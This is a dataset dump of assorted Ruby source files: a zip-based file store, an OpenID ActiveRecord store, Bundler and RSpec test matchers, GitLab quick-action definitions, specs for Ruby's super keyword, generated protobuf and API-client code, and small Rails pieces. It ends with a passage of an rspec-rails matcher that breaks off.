hexsha (string) | size (int64) | content (string) | avg_line_length (float64) | max_line_length (int64) | alphanum_fraction (float64)
---|---|---|---|---|---|
acbe7af04ad1cc35bc5f4bf83c484e1eac1259f1 | 3,144 | require 'zip'
require 'fileutils'
require 'json'
require 'zlib'
module Ld4lBrowserData
module Utilities
module FileSystems
class ZipFS
DEFAULT_PARAMS = {
:directory => '/DATA/DIR/NOT/SPECIFIED',
:prefix => 'http://draft.ld4l.org/'}
def initialize(params)
@settings = DEFAULT_PARAMS.merge(params)
@base_dir = @settings[:directory]
@prefix = @settings[:prefix]
end
# return a hash
def get_bookmark(key)
path = bookmark_path(key)
if File.exist?(path)
File.open(path) do |f|
JSON.load(f, nil, :symbolize_names => true)
end
else
nil
end
end
# contents is a hash
def set_bookmark(key, contents)
path = bookmark_path(key)
File.open(path, 'w') do |f|
JSON.dump(contents, f)
end
end
def bookmark_path(key)
File.join(@base_dir, 'bookmark_' + encode(key))
end
def acceptable?(uri)
uri.start_with?(@prefix)
end
def write(uri, contents)
name = remove_prefix(uri)
hash1, hash2 = hash_it(name)
safe_name = encode(name)
dir = File.join(@base_dir, hash1)
FileUtils.makedirs(dir)
path = File.join(dir, hash2 + '.zip')
Zip::File.open(path, Zip::File::CREATE) do |zip_file|
zip_file.get_output_stream(encode(uri)) do |out|
out.write(contents)
end
end
end
def remove_prefix(uri)
if uri.start_with?(@prefix)
uri[@prefix.size..-1]
else
uri
end
end
def hash_it(name)
hash = Zlib.crc32(name).to_s(16)
[hash[-4, 2], hash[-2, 2]]
end
ENCODE_REGEX = Regexp.compile("[\"*+,<=>?\\\\^|]|[^\x21-\x7e]", nil)
def encode(name)
name.gsub(ENCODE_REGEX) { |c| char2hex(c) }.tr('/:.', '=+,')
end
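# NOTE: char2hex is called by encode above but is not defined anywhere in this
# file; the helper below is an assumed minimal stand-in (not from the original
# source) so that encode can run. It escapes a character as "^" followed by its
# hex codepoint, reusing a character that encode already treats as unsafe.
def char2hex(c)
format('^%02x', c.ord)
end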
def close
# nothing to do
end
end
end
end
end
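# Usage sketch (directory, prefix and URI values are illustrative, not taken
# from the original project):
#
#   fs = Ld4lBrowserData::Utilities::FileSystems::ZipFS.new(
#     :directory => '/tmp/zipfs_data',
#     :prefix => 'http://draft.ld4l.org/')
#   uri = 'http://draft.ld4l.org/some_resource'
#   fs.write(uri, '<ttl triples>') if fs.acceptable?(uri)
#   fs.set_bookmark('offset', :count => 10)
#   fs.get_bookmark('offset')   # => {:count => 10}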
=begin
name = remove_prefix(uri)
hash1, hash2 = hash_it(name)
safe_name = encode(name)
File.join(@root_dir, hash1, hash2, safe_name + '.ttl')
Zip::File.open(zipfile_name, Zip::File::CREATE) do |zipfile|
input_filenames.each do |filename|
# Two arguments:
# - The name of the file as it will appear in the archive
# - The original file, including the path to find it
zipfile.add(filename, folder + '/' + filename)
end
zipfile.get_output_stream("myFile") { |os| os.write "myFile contains just this" }
end
Zip::File.open('my_zip.zip') do |zip_file|
# Handle entries one by one
zip_file.each do |entry|
if entry.directory?
puts "#{entry.name} is a folder!"
elsif entry.symlink?
puts "#{entry.name} is a symlink!"
elsif entry.file?
puts "#{entry.name} is a regular file!"
# Read into memory
content = entry.get_input_stream.read
# Output
puts content
else
puts "#{entry.name} is something unknown, oops!"
end
end
end
=end
| 25.152 | 83 | 0.549618 |
183ef2ecfe239b0bb2e540f4b34c5e45a70c464c | 1,830 | require 'ar_openid_store/association'
require 'ar_openid_store/nonce'
require 'openid/store/interface'
# not in OpenID module to avoid namespace conflict
class ActiveRecordStore < OpenID::Store::Interface
include ArOpenidStore
def store_association(server_url, assoc)
remove_association(server_url, assoc.handle)
Association.create(:server_url => server_url,
:handle => assoc.handle,
:secret => assoc.secret,
:issued => assoc.issued,
:lifetime => assoc.lifetime,
:assoc_type => assoc.assoc_type)
end
def get_association(server_url, handle=nil)
assocs = if handle.blank?
Association.find_all_by_server_url(server_url)
else
Association.find_all_by_server_url_and_handle(server_url, handle)
end
assocs.reverse.each do |assoc|
a = assoc.from_record
if a.expires_in == 0
assoc.destroy
else
return a
end
end if assocs.any?
return nil
end
def remove_association(server_url, handle)
Association.delete_all(['server_url = ? AND handle = ?', server_url, handle]) > 0
end
def use_nonce(server_url, timestamp, salt)
return false if Nonce.find_by_server_url_and_timestamp_and_salt(server_url, timestamp, salt)
return false if (timestamp - Time.now.to_i).abs > OpenID::Nonce.skew
Nonce.create(:server_url => server_url, :timestamp => timestamp, :salt => salt)
return true
end
def cleanup_nonces
now = Time.now.to_i
Nonce.delete_all(["timestamp > ? OR timestamp < ?", now + OpenID::Nonce.skew, now - OpenID::Nonce.skew])
end
def cleanup_associations
now = Time.now.to_i
Association.delete_all(['issued + lifetime > ?',now])
end
end
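# Usage sketch: an instance can be handed to ruby-openid wherever a store is
# expected (assumes the Association and Nonce models are backed by migrated
# tables), e.g.
#
#   consumer = OpenID::Consumer.new(session, ActiveRecordStore.new)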
| 30.5 | 108 | 0.653005 |
01e11eb94d3f9353e6440f5feb16eaccdfcbc086 | 6,867 | # frozen_string_literal: true
require "forwardable"
require_relative "the_bundle"
module Spec
module Matchers
extend RSpec::Matchers
class Precondition
include RSpec::Matchers::Composable
extend Forwardable
def_delegators :failing_matcher,
:failure_message,
:actual,
:description,
:diffable?,
:expected,
:failure_message_when_negated
def initialize(matcher, preconditions)
@matcher = with_matchers_cloned(matcher)
@preconditions = with_matchers_cloned(preconditions)
@failure_index = nil
end
def matches?(target, &blk)
return false if @failure_index = @preconditions.index {|pc| !pc.matches?(target, &blk) }
@matcher.matches?(target, &blk)
end
def does_not_match?(target, &blk)
return false if @failure_index = @preconditions.index {|pc| !pc.matches?(target, &blk) }
if @matcher.respond_to?(:does_not_match?)
@matcher.does_not_match?(target, &blk)
else
!@matcher.matches?(target, &blk)
end
end
def expects_call_stack_jump?
@matcher.expects_call_stack_jump? || @preconditions.any?(&:expects_call_stack_jump)
end
def supports_block_expectations?
@matcher.supports_block_expectations? || @preconditions.any?(&:supports_block_expectations)
end
def failing_matcher
@failure_index ? @preconditions[@failure_index] : @matcher
end
end
def self.define_compound_matcher(matcher, preconditions, &declarations)
raise "Must have preconditions to define a compound matcher" if preconditions.empty?
define_method(matcher) do |*expected, &block_arg|
Precondition.new(
RSpec::Matchers::DSL::Matcher.new(matcher, declarations, self, *expected, &block_arg),
preconditions
)
end
end
RSpec::Matchers.define :have_dep do |*args|
dep = Bundler::Dependency.new(*args)
match do |actual|
actual.length == 1 && actual.all? {|d| d == dep }
end
end
RSpec::Matchers.define :have_gem do |*args|
match do |actual|
actual.length == args.length && actual.all? {|a| args.include?(a.full_name) }
end
end
RSpec::Matchers.define :be_sorted do
diffable
attr_reader :expected
match do |actual|
expected = block_arg ? actual.sort_by(&block_arg) : actual.sort
actual.==(expected).tap do
# HACK: since rspec won't show a diff when everything is a string
differ = RSpec::Support::Differ.new
@actual = differ.send(:object_to_string, actual)
@expected = differ.send(:object_to_string, expected)
end
end
end
RSpec::Matchers.define :be_well_formed do
match(&:empty?)
failure_message do |actual|
actual.join("\n")
end
end
define_compound_matcher :read_as, [exist] do |file_contents|
diffable
match do |actual|
@actual = Bundler.read_file(actual)
values_match?(file_contents, @actual)
end
end
def indent(string, padding = 4, indent_character = " ")
string.to_s.gsub(/^/, indent_character * padding).gsub("\t", " ")
end
define_compound_matcher :include_gems, [be_an_instance_of(Spec::TheBundle)] do |*names|
match do
opts = names.last.is_a?(Hash) ? names.pop : {}
source = opts.delete(:source)
groups = Array(opts[:groups])
exclude_from_load_path = opts.delete(:exclude_from_load_path)
opts[:raise_on_error] = false
groups << opts
@errors = names.map do |name|
name, version, platform = name.split(/\s+/)
require_path = name == "bundler" ? "#{lib_dir}/bundler" : name.tr("-", "/")
version_const = name == "bundler" ? "Bundler::VERSION" : Spec::Builders.constantize(name)
code = []
code << "$LOAD_PATH.delete '#{exclude_from_load_path}'" if exclude_from_load_path
code << "require '#{require_path}.rb'"
code << "puts #{version_const}"
run code.join("; "), *groups
actual_version, actual_platform = out.strip.split(/\s+/, 2)
unless Gem::Version.new(actual_version) == Gem::Version.new(version)
next "#{name} was expected to be at version #{version} but was #{actual_version}"
end
unless actual_platform == platform
next "#{name} was expected to be of platform #{platform} but was #{actual_platform}"
end
next unless source
source_const = "#{Spec::Builders.constantize(name)}_SOURCE"
run "require '#{require_path}/source'; puts #{source_const}", *groups
unless out.strip == source
next "Expected #{name} (#{version}) to be installed from `#{source}`, was actually from `#{out}`"
end
end.compact
@errors.empty?
end
match_when_negated do
opts = names.last.is_a?(Hash) ? names.pop : {}
groups = Array(opts[:groups]) || []
opts[:raise_on_error] = false
@errors = names.map do |name|
name, version = name.split(/\s+/, 2)
run <<-R, *(groups + [opts])
begin
require '#{name}'
puts #{Spec::Builders.constantize(name)}
rescue LoadError, NameError
puts "WIN"
end
R
next if out == "WIN"
next "expected #{name} to not be installed, but it was" if version.nil?
if Gem::Version.new(out) == Gem::Version.new(version)
next "expected #{name} (#{version}) not to be installed, but it was"
end
end.compact
@errors.empty?
end
failure_message do
super() + " but:\n" + @errors.map {|e| indent(e) }.join("\n")
end
failure_message_when_negated do
super() + " but:\n" + @errors.map {|e| indent(e) }.join("\n")
end
end
RSpec::Matchers.define_negated_matcher :not_include_gems, :include_gems
RSpec::Matchers.alias_matcher :include_gem, :include_gems
def have_lockfile(expected)
read_as(strip_whitespace(expected))
end
def plugin_should_be_installed(*names)
names.each do |name|
expect(Bundler::Plugin).to be_installed(name)
path = Pathname.new(Bundler::Plugin.installed?(name))
expect(path + "plugins.rb").to exist
end
end
def plugin_should_not_be_installed(*names)
names.each do |name|
expect(Bundler::Plugin).not_to be_installed(name)
end
end
def lockfile_should_be(expected)
expect(bundled_app_lock).to have_lockfile(expected)
end
def gemfile_should_be(expected)
expect(bundled_app_gemfile).to read_as(strip_whitespace(expected))
end
end
end
| 32.7 | 109 | 0.612495 |
4a7b5c4c78967c70ed83218d3ff1cb62a29d160a | 511 | require 'spec_helper'
describe PeerReview do
it { is_expected.to belong_to(:result) }
it { is_expected.to belong_to(:reviewer) }
describe 'reviewee integrity' do
let!(:peer_review) { create(:peer_review) }
it 'reviewer should not be the reviewee' do
expect(peer_review.reviewer.id).to_not eq peer_review.reviewee.id
end
it 'should have reviewer have a review to others' do
expect(peer_review.reviewer.peer_reviews_to_others.first.id).to eq peer_review.id
end
end
end
| 26.894737 | 87 | 0.727984 |
ac4e4177fa7ee85cdc88a6d81cc17771dfbc4230 | 534 | Pod::Spec.new do |s|
s.name = "WTTranslateModel"
s.version = "0.0.5"
s.summary = "WTTranslateModel个人中心模块"
s.homepage = "https://github.com/aliang666/WTTranslateModel"
s.license = "MIT"
s.author = { "jienliang000" => "[email protected]" }
s.platform = :ios
s.platform = :ios, "8.0"
s.requires_arc = true
s.source = { :git => "https://github.com/aliang666/WTTranslateModel.git", :tag => "#{s.version}" }
s.source_files = "WTTranslateModel/*.{h,m}"
end
| 28.105263 | 106 | 0.582397 |
d540ce56f61855e04354c23c5ea7bc0218fc5e48 | 1,140 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v8/errors/not_allowlisted_error.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v8/errors/not_allowlisted_error.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v8.errors.NotAllowlistedErrorEnum" do
end
add_enum "google.ads.googleads.v8.errors.NotAllowlistedErrorEnum.NotAllowlistedError" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :CUSTOMER_NOT_ALLOWLISTED_FOR_THIS_FEATURE, 2
end
end
end
module Google
module Ads
module GoogleAds
module V8
module Errors
NotAllowlistedErrorEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v8.errors.NotAllowlistedErrorEnum").msgclass
NotAllowlistedErrorEnum::NotAllowlistedError = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v8.errors.NotAllowlistedErrorEnum.NotAllowlistedError").enummodule
end
end
end
end
end
| 36.774194 | 202 | 0.765789 |
1aa5cdc997588a0f9adcf5c8fdabe6f35370d998 | 628 | #! /usr/bin/env ruby
require 'nokogiri'
filename = File.expand_path(ARGV[0])
html = ""
File.open(filename) do |f|
f.readlines.each do |line|
html << line
end
end
doc = Nokogiri::HTML(html)
doc.xpath('//comment()').each { |comment| comment.replace(comment.text) } #removes comment tags and exposes contents as html
all_arrs = []
doc.search('table').each do |table|
arr = []
table.search('tr').each do |row|
cells = row.search('th, td').map { |cell| cell.text.strip }
arr << cells
end
all_arrs << arr
end
all_arrs.each do |arr|
arr.each do |row|
puts row.join("\t")
end
puts "\n\n\n"
end
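# Usage sketch (the script name is illustrative):
#   ruby extract_tables.rb saved_page.html > tables.tsv
# Every <table> in the page -- including tables hidden inside HTML comments,
# which the comment-unwrapping above exposes -- is printed as tab-separated
# rows, with blank lines between tables.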
| 17.942857 | 124 | 0.636943 |
fff991f735f737ed8ca5d6c4cabceb53cccd19ba | 122 | class PhrasesController < ApplicationController
def index
phrases = Phrases.all
render json: phrases
end
end
| 17.428571 | 47 | 0.745902 |
b9ca67fd83dbf8adac75872dba66ce733da69115 | 324 | module Socialite
module Models
module FacebookIdentity
extend ActiveSupport::Concern
included do
include Socialite::ApiWrappers::Facebook
has_one :identity, :as => :api
delegate :access_token, :access_token_secret, :to => :identity, :allow_nil => true
end
end
end
end
| 21.6 | 90 | 0.660494 |
1d6ac4e9bced1f4646560b846e6d9d1b8fae84f0 | 622 | # ProjectHanlon Policy Base class
# Root abstract
module ProjectHanlon
module PolicyTemplate
class VMwareHypervisor < ProjectHanlon::PolicyTemplate::Base
include(ProjectHanlon::Logging)
# @param hash [Hash]
def initialize(hash)
super(hash)
@hidden = false
@template = :vmware_hypervisor
@description = "Policy for deploying a VMware hypervisor."
from_hash(hash) unless hash == nil
end
def mk_call(node)
model.mk_call(node, @uuid)
end
def boot_call(node)
model.boot_call(node, @uuid)
end
end
end
end
| 20.064516 | 66 | 0.635048 |
6aa3f515ef0d358cc9b4f66305ea6b91af812ea9 | 10,466 | # frozen_string_literal: true
module Gitlab
module QuickActions
module IssuableActions
extend ActiveSupport::Concern
include Gitlab::QuickActions::Dsl
SHRUG = '¯\\_(ツ)_/¯'
TABLEFLIP = '(╯°□°)╯︵ ┻━┻'
included do
# Issue, MergeRequest, Epic: quick actions definitions
desc do
_('Close this %{quick_action_target}') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
explanation do
_('Closes this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
execution_message do
_('Closed this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
types Issuable
condition do
quick_action_target.persisted? &&
quick_action_target.open? &&
current_user.can?(:"update_#{quick_action_target.to_ability_name}", quick_action_target)
end
command :close do
@updates[:state_event] = 'close'
end
desc do
_('Reopen this %{quick_action_target}') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
explanation do
_('Reopens this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
execution_message do
_('Reopened this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
types Issuable
condition do
quick_action_target.persisted? &&
quick_action_target.closed? &&
current_user.can?(:"update_#{quick_action_target.to_ability_name}", quick_action_target)
end
command :reopen do
@updates[:state_event] = 'reopen'
end
desc _('Change title')
explanation do |title_param|
_('Changes the title to "%{title_param}".') % { title_param: title_param }
end
execution_message do |title_param|
_('Changed the title to "%{title_param}".') % { title_param: title_param }
end
params '<New title>'
types Issuable
condition do
quick_action_target.persisted? &&
current_user.can?(:"update_#{quick_action_target.to_ability_name}", quick_action_target)
end
command :title do |title_param|
@updates[:title] = title_param
end
desc _('Add label(s)')
explanation do |labels_param|
labels = find_label_references(labels_param)
if labels.any?
_("Adds %{labels} %{label_text}.") %
{ labels: labels.join(' '), label_text: 'label'.pluralize(labels.count) }
end
end
params '~label1 ~"label 2"'
types Issuable
condition do
parent &&
current_user.can?(:"admin_#{quick_action_target.to_ability_name}", parent) &&
find_labels.any?
end
command :label do |labels_param|
run_label_command(labels: find_labels(labels_param), command: :label, updates_key: :add_label_ids)
end
desc _('Remove all or specific label(s)')
explanation do |labels_param = nil|
label_references = labels_param.present? ? find_label_references(labels_param) : []
if label_references.any?
_("Removes %{label_references} %{label_text}.") %
{ label_references: label_references.join(' '), label_text: 'label'.pluralize(label_references.count) }
else
_('Removes all labels.')
end
end
params '~label1 ~"label 2"'
types Issuable
condition do
quick_action_target.persisted? &&
quick_action_target.labels.any? &&
current_user.can?(:"admin_#{quick_action_target.to_ability_name}", parent)
end
command :unlabel, :remove_label do |labels_param = nil|
if labels_param.present?
labels = find_labels(labels_param)
label_ids = labels.map(&:id)
label_references = labels_to_reference(labels, :name)
if label_ids.any?
@updates[:remove_label_ids] ||= []
@updates[:remove_label_ids] += label_ids
@updates[:remove_label_ids].uniq!
end
else
@updates[:label_ids] = []
label_references = []
end
@execution_message[:unlabel] = remove_label_message(label_references)
end
desc _('Replace all label(s)')
explanation do |labels_param|
labels = find_label_references(labels_param)
"Replaces all labels with #{labels.join(' ')} #{'label'.pluralize(labels.count)}." if labels.any?
end
params '~label1 ~"label 2"'
types Issuable
condition do
quick_action_target.persisted? &&
quick_action_target.labels.any? &&
current_user.can?(:"admin_#{quick_action_target.to_ability_name}", parent)
end
command :relabel do |labels_param|
run_label_command(labels: find_labels(labels_param), command: :relabel, updates_key: :label_ids)
end
desc _('Add a To Do')
explanation _('Adds a To Do.')
execution_message _('Added a To Do.')
types Issuable
condition do
quick_action_target.persisted? &&
!TodoService.new.todo_exist?(quick_action_target, current_user)
end
command :todo do
@updates[:todo_event] = 'add'
end
desc _('Mark To Do as done')
explanation _('Marks To Do as done.')
execution_message _('Marked To Do as done.')
types Issuable
condition do
quick_action_target.persisted? &&
TodoService.new.todo_exist?(quick_action_target, current_user)
end
command :done do
@updates[:todo_event] = 'done'
end
desc _('Subscribe')
explanation do
_('Subscribes to this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
execution_message do
_('Subscribed to this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
types Issuable
condition do
quick_action_target.persisted? &&
!quick_action_target.subscribed?(current_user, project)
end
command :subscribe do
@updates[:subscription_event] = 'subscribe'
end
desc _('Unsubscribe')
explanation do
_('Unsubscribes from this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
execution_message do
_('Unsubscribed from this %{quick_action_target}.') %
{ quick_action_target: quick_action_target.to_ability_name.humanize(capitalize: false) }
end
types Issuable
condition do
quick_action_target.persisted? &&
quick_action_target.subscribed?(current_user, project)
end
command :unsubscribe do
@updates[:subscription_event] = 'unsubscribe'
end
desc _('Toggle emoji award')
explanation do |name|
_("Toggles :%{name}: emoji award.") % { name: name } if name
end
execution_message do |name|
_("Toggled :%{name}: emoji award.") % { name: name } if name
end
params ':emoji:'
types Issuable
condition do
quick_action_target.persisted?
end
parse_params do |emoji_param|
match = emoji_param.match(Banzai::Filter::EmojiFilter.emoji_pattern)
match[1] if match
end
command :award do |name|
if name && quick_action_target.user_can_award?(current_user)
@updates[:emoji_award] = name
end
end
desc _("Append the comment with %{shrug}") % { shrug: SHRUG }
params '<Comment>'
types Issuable
substitution :shrug do |comment|
"#{comment} #{SHRUG}"
end
desc _("Append the comment with %{tableflip}") % { tableflip: TABLEFLIP }
params '<Comment>'
types Issuable
substitution :tableflip do |comment|
"#{comment} #{TABLEFLIP}"
end
private
def run_label_command(labels:, command:, updates_key:)
return if labels.empty?
@updates[updates_key] ||= []
@updates[updates_key] += labels.map(&:id)
@updates[updates_key].uniq!
label_references = labels_to_reference(labels, :name)
@execution_message[command] = case command
when :relabel
_('Replaced all labels with %{label_references} %{label_text}.') %
{
label_references: label_references.join(' '),
label_text: 'label'.pluralize(label_references.count)
}
when :label
_('Added %{label_references} %{label_text}.') %
{
label_references: label_references.join(' '),
label_text: 'label'.pluralize(labels.count)
}
end
end
def remove_label_message(label_references)
if label_references.any?
_("Removed %{label_references} %{label_text}.") %
{ label_references: label_references.join(' '), label_text: 'label'.pluralize(label_references.count) }
else
_('Removed all labels.')
end
end
end
end
end
end
| 37.113475 | 117 | 0.571183 |
6a024cae236fc3ff2854973b88af453a24b2ded1 | 10,384 | module SuperSpecs
module S1
class A
def foo(a)
a << "A#foo"
bar(a)
end
def bar(a)
a << "A#bar"
end
end
class B < A
def foo(a)
a << "B#foo"
super(a)
end
def bar(a)
a << "B#bar"
super(a)
end
end
end
module S2
class A
def baz(a)
a << "A#baz"
end
end
class B < A
def foo(a)
a << "B#foo"
baz(a)
end
end
class C < B
def baz(a)
a << "C#baz"
super(a)
end
end
end
module S3
class A
def foo(a)
a << "A#foo"
end
def self.foo(a)
a << "A.foo"
end
def self.bar(a)
a << "A.bar"
foo(a)
end
end
class B < A
def self.foo(a)
a << "B.foo"
super(a)
end
def self.bar(a)
a << "B.bar"
super(a)
end
end
end
module S4
class A
def foo(a)
a << "A#foo"
end
end
class B < A
def foo(a, b)
a << "B#foo(a,#{b})"
super(a)
end
end
end
class S5
def here
:good
end
end
class S6 < S5
def under
yield
end
def here
under {
super
}
end
end
class S7 < S5
define_method(:here) { super() }
end
module MS1
module ModA
def foo(a)
a << "ModA#foo"
bar(a)
end
def bar(a)
a << "ModA#bar"
end
end
class A
include ModA
end
module ModB
def bar(a)
a << "ModB#bar"
super(a)
end
end
class B < A
def foo(a)
a << "B#foo"
super(a)
end
include ModB
end
end
module MS2
class A
def baz(a)
a << "A#baz"
end
end
module ModB
def foo(a)
a << "ModB#foo"
baz(a)
end
end
class B < A
include ModB
end
class C < B
def baz(a)
a << "C#baz"
super(a)
end
end
end
module MultiSuperTargets
module M
def foo
super
end
end
class BaseA
def foo
:BaseA
end
end
class BaseB
def foo
:BaseB
end
end
class A < BaseA
include M
end
class B < BaseB
include M
end
end
module MS3
module ModA
def foo(a)
a << "ModA#foo"
end
def bar(a)
a << "ModA#bar"
foo(a)
end
end
class A
def foo(a)
a << "A#foo"
end
class << self
include ModA
end
end
class B < A
def self.foo(a)
a << "B.foo"
super(a)
end
def self.bar(a)
a << "B.bar"
super(a)
end
end
end
module MS4
module Layer1
def example
5
end
end
module Layer2
include Layer1
def example
super
end
end
class A
include Layer2
public :example
end
end
class MM_A
undef_method :is_a?
end
class MM_B < MM_A
def is_a?(blah)
# should fire the method_missing below
super
end
def method_missing(*)
false
end
end
class Alias1
def name
[:alias1]
end
end
class Alias2 < Alias1
def initialize
@times = 0
end
def name
if @times >= 10
raise "runaway super"
end
@times += 1
# Use this so that we can see collect all supers that we see.
# One bug that arises is that we call Alias2#name from Alias2#name
# as it's superclass. In that case, either we get a runaway recursion
# super OR we get the return value being [:alias2, :alias2, :alias1]
# rather than [:alias2, :alias1].
#
# Which one depends on caches and how super is implemented.
[:alias2] + super
end
end
class Alias3 < Alias2
alias_method :name3, :name
# In the method table for Alias3 now should be a special alias entry
# that references Alias2 and Alias2#name (probably as an object).
#
# When name3 is called then, Alias2 (NOT Alias3) is presented as the
# current module to Alias2#name, so that when super is called,
# Alias2's superclass is next.
#
# Otherwise, Alias2 is next, which is where name was to begin with,
# causing the wrong #name method to be called.
end
module AliasWithSuper
module AS1
def foo
:a
end
end
module BS1
def foo
[:b, super]
end
end
class Base
extend AS1
extend BS1
end
class Trigger < Base
class << self
def foo_quux
foo_baz
end
alias_method :foo_baz, :foo
alias_method :foo, :foo_quux
end
end
end
module RestArgsWithSuper
class A
def a(*args)
args
end
end
class B < A
def a(*args)
args << "foo"
super
end
end
end
class AnonymousModuleIncludedTwiceBase
def self.whatever
mod = Module.new do
def a(array)
array << "anon"
super
end
end
include mod
end
def a(array)
array << "non-anon"
end
end
class AnonymousModuleIncludedTwice < AnonymousModuleIncludedTwiceBase
whatever
whatever
end
module ZSuperWithBlock
class A
def a
yield
end
def b(&block)
block.call
end
def c
yield
end
end
class B < A
def a
super { 14 }
end
def b
block_ref = -> { 15 }
[super { 14 }, super(&block_ref)]
end
def c
block_ref = -> { 16 }
super(&block_ref)
end
end
end
module ZSuperWithOptional
class A
def m(x, y, z)
z
end
end
class B < A
def m(x, y, z = 14)
super
end
end
class C < A
def m(x, y, z = 14)
z = 100
super
end
end
end
module ZSuperWithRest
class A
def m(*args)
args
end
def m_modified(*args)
args
end
end
class B < A
def m(*args)
super
end
def m_modified(*args)
args[1] = 14
super
end
end
end
module ZSuperWithRestAndOthers
class A
def m(a, b, *args)
args
end
def m_modified(a, b, *args)
args
end
end
class B < A
def m(a, b, *args)
super
end
def m_modified(a, b, *args)
args[1] = 14
super
end
end
end
module ZSuperWithRestReassigned
class A
def a(*args)
args
end
end
class B < A
def a(*args)
args = ["foo"]
super
end
end
end
module ZSuperWithRestReassignedWithScalar
class A
def a(*args)
args
end
end
class B < A
def a(*args)
args = "foo"
super
end
end
end
module ZSuperWithUnderscores
class A
def m(*args)
args
end
def m_modified(*args)
args
end
end
class B < A
def m(_, _)
super
end
def m_modified(_, _)
_ = 14
super
end
end
end
module Keywords
class Arguments
def foo(**args)
args
end
end
# ----
class RequiredArguments < Arguments
def foo(a:)
super
end
end
class OptionalArguments < Arguments
def foo(b: 'b')
super
end
end
class PlaceholderArguments < Arguments
def foo(**args)
super
end
end
# ----
class RequiredAndOptionalArguments < Arguments
def foo(a:, b: 'b')
super
end
end
class RequiredAndPlaceholderArguments < Arguments
def foo(a:, **args)
super
end
end
class OptionalAndPlaceholderArguments < Arguments
def foo(b: 'b', **args)
super
end
end
# ----
class RequiredAndOptionalAndPlaceholderArguments < Arguments
def foo(a:, b: 'b', **args)
super
end
end
end
module RegularAndKeywords
class Arguments
def foo(a, **options)
[a, options]
end
end
# -----
class RequiredArguments < Arguments
def foo(a, b:)
super
end
end
class OptionalArguments < Arguments
def foo(a, c: 'c')
super
end
end
class PlaceholderArguments < Arguments
def foo(a, **options)
super
end
end
# -----
class RequiredAndOptionalArguments < Arguments
def foo(a, b:, c: 'c')
super
end
end
class RequiredAndPlaceholderArguments < Arguments
def foo(a, b:, **options)
super
end
end
class OptionalAndPlaceholderArguments < Arguments
def foo(a, c: 'c', **options)
super
end
end
# -----
class RequiredAndOptionalAndPlaceholderArguments < Arguments
def foo(a, b:, c: 'c', **options)
super
end
end
end
module SplatAndKeywords
class Arguments
def foo(*args, **options)
[args, options]
end
end
class AllArguments < Arguments
def foo(*args, **options)
super
end
end
end
module FromBasicObject
def __send__(name, *args, &block)
super
end
end
module IntermediateBasic
include FromBasicObject
end
class IncludesFromBasic
include FromBasicObject
def foobar; 43; end
end
class IncludesIntermediate
include IntermediateBasic
def foobar; 42; end
end
module SingletonCase
class Base
def foobar(array)
array << :base
end
end
class Foo < Base
def foobar(array)
array << :foo
super
end
end
end
module SingletonAliasCase
class Base
def foobar(array)
array << :base
end
def alias_on_singleton
object = self
singleton = (class << object; self; end)
singleton.__send__(:alias_method, :new_foobar, :foobar)
end
end
class Foo < Base
def foobar(array)
array << :foo
super
end
end
end
end
| 14.898135 | 75 | 0.499326 |
62065d3563fd382a2963f5a80db006735be15b1a | 160 | class EventsController < ApplicationController
def index
@events = Event.order(time: :asc).where(time: 1.days.from_now..DateTime::Infinity.new)
end
end
| 26.666667 | 90 | 0.75 |
7a5c3f74be9debad8d74730df8bf4f4c465c1d2e | 136 | class AddColumnVotes < ActiveRecord::Migration
def change
add_column :votes, :up, :boolean, default: false, null: false
end
end
| 22.666667 | 65 | 0.735294 |
1c82339272bb914573f9374cb6be3ab7f3fbe4a5 | 2,195 | =begin
#Signing Today Web
#*Signing Today* is the perfect Digital Signature Gateway. Whenever in Your workflow You need to add one or more Digital Signatures to Your document, *Signing Today* is the right choice. You prepare Your documents, *Signing Today* takes care of all the rest: send invitations (`signature tickets`) to signers, collects their signatures, send You back the signed document. Integrating *Signing Today* in Your existing applications is very easy. Just follow these API specifications and get inspired by the many examples presented hereafter.
The version of the OpenAPI document: 2.0.0
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.2.3
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for SigningTodayAPIClient::DSTStatusChangedNotification
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'DSTStatusChangedNotification' do
before do
# run before each test
@instance = SigningTodayAPIClient::DSTStatusChangedNotification.new
end
after do
# run after each test
end
describe 'test an instance of DSTStatusChangedNotification' do
it 'should create an instance of DSTStatusChangedNotification' do
expect(@instance).to be_instance_of(SigningTodayAPIClient::DSTStatusChangedNotification)
end
end
describe 'test attribute "status"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
# validator = Petstore::EnumTest::EnumAttributeValidator.new('String', ["toFill", "toSign", "expired", "performed", "error"])
# validator.allowable_values.each do |value|
# expect { @instance.status = value }.not_to raise_error
# end
end
end
describe 'test attribute "dst"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "reason"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 37.844828 | 540 | 0.749886 |
91b653f9eb5aa7df9cbdb92ccf5526ff731ddcea | 2,119 | module RSpec::Rails::Matchers
# @api private
#
# Matcher class for `be_a_new`. Should not be instantiated directly.
#
# @see RSpec::Rails::Matchers#be_a_new
